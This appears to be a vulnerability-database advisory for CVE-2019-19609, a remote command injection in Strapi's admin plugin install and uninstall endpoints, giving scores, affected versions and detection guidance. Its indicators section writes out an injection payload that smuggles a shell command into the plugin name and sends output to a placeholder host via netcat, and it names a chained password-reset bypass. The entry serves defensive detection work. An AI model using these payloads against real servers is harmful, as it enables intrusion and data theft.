CVE-2019-19609
published 2019-12-05

Priority: P1 · 79 · high · CVSS 3.1 score 7.2
CVSS vector: AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 54.08% (98.9th percentile)
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.

Affected

3 ranges
Vendor | Product | Version range           | Fixed in
strapi | strapi  | <= 1.6.4                |
strapi | strapi  |                         |
strapi | strapi  | >= 0 < 3.0.0-beta.17.8  | 3.0.0-beta.17.8

Detection & IOCs (extracted from sources)

url: http://api-prod.horizontall.htb/admin/plugins/install
url: /admin/plugins/install
path: /tmp/.m3
command: documentation && $(command > /tmp/.m3 && nc LHOST 9999 < /tmp/.m3 | rm /tmp/.m3)
command: documentation && $(cmd)
port: 9999
url: /admin/auth/reset-password
url: /admin/init
path: /opt/strapi/.ssh/authorized_keys
  • Detect POST requests to /admin/plugins/install endpoint with a 'plugin' field containing shell metacharacters such as '&&' or '$(' indicating command injection via the unsanitized plugin name parameter.
  • Monitor for POST requests to /admin/plugins/install carrying a JSON body where the 'plugin' value contains shell command substitution patterns (e.g., '$(...)').
  • Alert on outbound netcat (nc) connections spawned by the Strapi/Node.js process, particularly to ephemeral attacker-controlled IPs on port 9999, as this is the default exfil port used by the public exploit.
  • Detect creation of the file /tmp/.m3 by the Strapi process, which is used as a temporary output buffer by the authenticated RCE exploit.
  • Monitor unauthenticated POST requests to /admin/auth/reset-password with a JSON body containing a MongoDB-style operator key '$gt' in the 'code' field, indicating exploitation of CVE-2019-18818 used as a precursor to this RCE.
  • Flag requests to /admin/init endpoint that enumerate the Strapi version, as attackers use this to confirm a vulnerable version (3.0.0-beta.17.4 or lower) before launching the exploit.
  • The RCE is blind — command output is not returned inline in the HTTP response; attackers must use out-of-band channels (e.g., netcat reverse shell or curl to attacker-controlled server) to retrieve results.
  • The vulnerability affects Strapi versions up to and including 3.0.0-beta.17.7; the fix was introduced in 3.0.0-beta.17.8.
  • The injection point is the unsanitized 'plugin' name field passed to the execa function; both the Install (/admin/plugins/install) and Uninstall plugin endpoints are affected.

CVSS provenance

nvd (v3.1): 7.2 HIGH · CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd (v2.0): 9.0 CRITICAL · AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck: 7.2 HIGH